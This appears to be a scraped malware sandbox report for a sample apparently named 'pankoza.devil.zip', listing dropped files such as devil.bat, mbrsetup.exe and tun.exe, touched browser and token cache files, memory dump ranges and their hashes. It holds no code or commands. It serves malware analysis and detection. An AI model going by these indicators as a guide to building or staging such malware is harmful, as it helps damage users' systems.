d3254c3ce7598307f6d95f0d5aef95b5

SHA1
2d97512051d7e7d0456f5e78c53931fc178b1f5f

SHA256
3a8cf7af3394babbef989a1168903dbb984bebc5c6e01d2544d76ae8a7332dc0

SHA512
385ae4cce85bced22635c9fd5c859195db33c053f361fc33658497fbf6c101554c6bdcb01d83def91fb20883cdab12b0fc542badc4885d61a7fd13ff38a95cf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
105a8253978e1c068b205382efd2e60c

SHA1
3d594eee38aa8ca48965bd87c1da0a4872abead6

SHA256
4f91f953fe5e624055248c260552bda4381421588d6f27eec8a3daccd0f3a8d4

SHA512
af3a7bab61da6ba2d578df1f460a55df701684b37858ec2a6e320467d74ab4cba9fd8681f4b49f02c47a5d6b381d8fc237ce6871d2517023b52263257b12a5ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
de7b286bf56b874bad371a3773936ff1

SHA1
fe9490a5843f4144faa3c8d8c5d06af2561ea98c

SHA256
831f642e85069406be630e0c7ea89337fc8490ee26187eb9860a5e188a950ecb

SHA512
3dc76631e152942425425b936112e73aa03d4c20f65e0c91fe412c23ca02f13207d6c291de31fac57aa1585f7d0846540052a4abca20f28882b99ab96a9e417d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\11988B62-8EEE-4097-AC1A-0F74BB364C5D

Filesize
172KB

MD5
0e82c46235ac1720e56965c70b0c26c8

SHA1
968f48eb2bec0b591cee8cdfd12ca284d6b71ade

SHA256
515747c37f4a18c2b810009b740db23764319485c4c8809d66753602497218e5

SHA512
751b6865f691311c6eac49cdd40679d69664c8e558cb6cb597981bb573c5b0a89b90249dc39ed0052dea150a7c727f72ba41533eecbe6f1d2479aea41e20f39e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal

Filesize
12KB

MD5
1922ebd064035b46d6447094a91b9a63

SHA1
9b88f679c496df2e07418ee9c1915f1a79eda6b9

SHA256
f8d63a9cfa5ce4bef5a7ef3b408c3cc984e9aeb3401174fead82b9277af90ff7

SHA512
abaeb6bbc2cb9ae559bfb57b5858d9e9208986a09946138af11028bdfe199aa13ea43f7882a5018ad7363e979cf380505959253b6f6e649e98d5a4268f193036

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal

Filesize
20KB

MD5
f6ba126591b455b381873bb890b77b6c

SHA1
c1ce1c01c329622acefa0f9e30e83789c88bafd9

SHA256
d4c8cfd3705364a7f509571b625eac88d313aa238025631cd6a14e809e8597ae

SHA512
3b131716e77d14af8be02b0442313aca3d2cee523e5fce3f322508f9a6e1909a32511fa6f6870d2b6f52345c6badb930367deef6050614a3f570faf9b0b7d0bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Filesize
2KB

MD5
ed47ed9ef55ea22f4abf41d281a49ca2

SHA1
e44145f87a88130b48f0afac435f46177bf828f6

SHA256
46467d71e41f66137c1d7113d7759d763b39f587ea8bb1841dddcb1cf8f29f13

SHA512
5334ccbabf9a82ee6de826171106564641fe70462ebbc55ef71687c5a4c00e25008d98bf105cef7c292d251771d542bf44b7295123b024b53abe026af0e0d2e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
4fc1468d4105ccffefc55a2faf091b84

SHA1
e4d2f70f7b3efc0ea287ed57ae50994059922738

SHA256
1d0d66def514ad0912ac465948c41457eb47ceeb39d0e64e2eca52a225dd9c83

SHA512
b9ff6e33632a2f8073a7a0c3ff199272f6dfeebf602fa44639192116843e0c19d08620b4cfe17b4c0d3696bdaa41e5c54f8580f6f9daae5c7efebc1fe2d247d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
4e1238a1ef056f4d5f6e5b59f4796ffc

SHA1
a8f2a1afc7cebc384c21066d01c79021efb3a7cf

SHA256
7e1bf34b61f3f199cfbaa3fdb9f0bab36c923223d2d0ae44dd4bf65f64189414

SHA512
dacb8343a767618c024e7864a0a0e191bb50f1b4a103824c014e6ff79fcc7a0c9c10dcbd7893a046b65c20a58e66451aaf44dc6c7e682d5d35588f242b2a67fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

Filesize
4KB

MD5
4acaeed5416b06ac194aef83834b30e8

SHA1
eff85a3db1b93d8a8be2659283fde382134ab9d5

SHA256
7490ec7a43a7e3d7b1f87c1dd537708b60558d65a9dc245aa9285b4ad6dea541

SHA512
0782572e19ed7e613e16827a5ab58504037673bc79fc33a9d74d63e396cef7017d982631dfd7b1bca0c40570769c142440ef24e79812cf28354ee877e36f460b

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs

Filesize
16B

MD5
7b0d97042752fda3ad0b60a260e98c94

SHA1
c8bd85acf946ca4e77aa711b9a482eba2054dac7

SHA256
ee4a4579647de7d1277bb18ad9657d2ac2e155d693c56d771ad4b0f98cf7b00d

SHA512
82981faf90aa6a1649a97f9eb7117782554095f8acf7fade47d7edec0d25de0e3023dfdc58e4f45f42029dd532eb79b2f5411670580f106db110c18acca630f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\bg.bmp

Filesize
506KB

MD5
ee1b910539fb2e71ed52d051c6a5c9b5

SHA1
ffee3fdfaf7e62ea14fd52f6a9d5b774d58ab720

SHA256
4b23052d3e199074c625ba9c5ed3969e8122190ce602917105a4c34efdfe826a

SHA512
097ab1ee2a2207264f789defb6b78d8bb1b4538461eb3af0ce7a6163f1007ecdab678eeeaebcd65853fa2430a9890f8e0ecac5b89908e045cf9493fc4017e23d

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\devil.bat

Filesize
1KB

MD5
145c2fb7ddf0b62446981c1df4bc1883

SHA1
701193178d5ab617597f963b8c63e9336a3d39dc

SHA256
02a3785412bffa5946f8db6308f3aa8f4f6bccb67581bca68eebabcfe6be5df8

SHA512
d59f937f2fa2f6d5454dfc8654105fccbcac4dd7623f2d7ec87dd7b7da9cf7a2144b09f95b81aea07d9cf0a9f8ecee604669233007ec09507af8dd7513cd8e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\edr.exe

Filesize
104KB

MD5
cd1e400144f158e6028e6813ce69ec7f

SHA1
ba08342a82714a0f3031317b9344592054d9e655

SHA256
5a6373b8837ba77a2e388f804e8c0b70d7bee2c7b5cb8e5521098defdf177ea0

SHA512
40991a5c0e6133da7b8889c9e5b1a250f8a262c6cbcc98909be2a67c40cd5ff21ae18aa70ce8cf311fd38bf4f306b470dc89ca2fc578120462b628a51ccc64ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\mbrsetup.exe

Filesize
1.3MB

MD5
f04eacd2e03827b7e527be092236bfcc

SHA1
b60c9f36f41c65572239c1a220a8038a0ac004f9

SHA256
01d032b0a36b096797c4f93b494c0d5837d365b56b15f056e8852e01cca4731b

SHA512
89f2f7b73b750093c00dade91011fab33ffba2f619c60ad5284f7bf0775185478e90725e5a8cd7d75964f364acbc64a85b18bb534bca3e1200e42f4b1223510c

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\r.exe

Filesize
106KB

MD5
cafcd9ccdce80c00eea1b7042cf28399

SHA1
91f690b153223d52f7f58febf65b724f4a5daa5c

SHA256
51d0e9cc07d369b1c0f99c601d11ee2f6e1bc4a53f84f4948d1a408c5f6dcf54

SHA512
11ac724a2fa16a22d78b00708421a24ad24dd16e14bc6f299dc0da30b415b4ad56461ae29572588364013bbc0e188a6c8fbfbf93cbd4690f0c11f01ce814146e

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\tun.exe

Filesize
104KB

MD5
f345b84584c45d21f09c49ca44ea93d2

SHA1
56c15d5380105f1c222471fbb309115b01d46895

SHA256
7f0e01afc91f05815029b59171c642b56b6c15fcc0fbc94ba29b6857c56799d3

SHA512
010a2babd8728abb635d28abeb2fe2110a1c75b1c129b56e055302dbd95a069da9f3470a9568191e9dee54217f25a3a81732a420d0328e533f0cf1216a441e7e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
c3b307b5aee679a98a1b40eaa61cd1fa

SHA1
8e2ce991981cd6f06c8e32ba0646a4e598dd04e4

SHA256
d097cd5f6678d0fa56b221bf8a1cbb30387a10307bd4f9517b88176378844159

SHA512
93bae60b51738812070ae706d1212f339bd5003ced097d22aa0d397c37fe6a7f733e1db26916d5cb33dff1967c2e5cfbba90d8ec18bf572273da1c4fac86e0f6

Download Submit
C:\Users\Admin\Downloads\pankoza.devil.zip

Filesize
1.7MB

MD5
e56df9e749b82d6d1fbd4568ee8625f4

SHA1
757a9fc15dea4fa3739c31279add8d1b2720ca42

SHA256
d1900717140ae920c1cc6c73411ee59d31d684fd93f8ab309964186daebaf66d

SHA512
5a1cf2f5a384a4e34a727bd24b262a5f4f663e5fc05c1465943ddd90ad0ef47d600635d156ab3738c420df600e12d2050cf0eec48ea72db634bfefe9d89f0255

Download Submit
memory/536-348-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/536-457-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/536-470-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/536-365-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/536-370-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/536-376-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/536-406-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/1492-296-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/4308-347-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/4908-346-0x0000000000400000-0x000000000062E000-memory.dmp

Filesize
2.2MB

Download
memory/4908-256-0x0000000000400000-0x000000000062E000-memory.dmp

Filesize
2.2MB

Download
memory/4908-473-0x0000000000400000-0x000000000062E000-memory.dmp

Filesize
2.2MB

Download
memory/10812-407-0x00007FFB96E30000-0x00007FFB96E40000-memory.dmp

Filesize
64KB

Download
memory/10812-410-0x00007FFB96E30000-0x00007FFB96E40000-memory.dmp

Filesize
64KB

Download
memory/10812-413-0x00007FFB94C70000-0x00007FFB94C80000-memory.dmp

Filesize
64KB

Download
memory/10812-412-0x00007FFB94C70000-0x00007FFB94C80000-memory.dmp

Filesize
64KB

Download
memory/10812-409-0x00007FFB96E30000-0x00007FFB96E40000-memory.dmp

Filesize
64KB

Download
memory/10812-411-0x00007FFB96E30000-0x00007FFB96E40000-memory.dmp

Filesize
64KB

Download
memory/10812-408-0x00007FFB96E30000-0x00007FFB96E40000-memory.dmp

Filesize
64KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads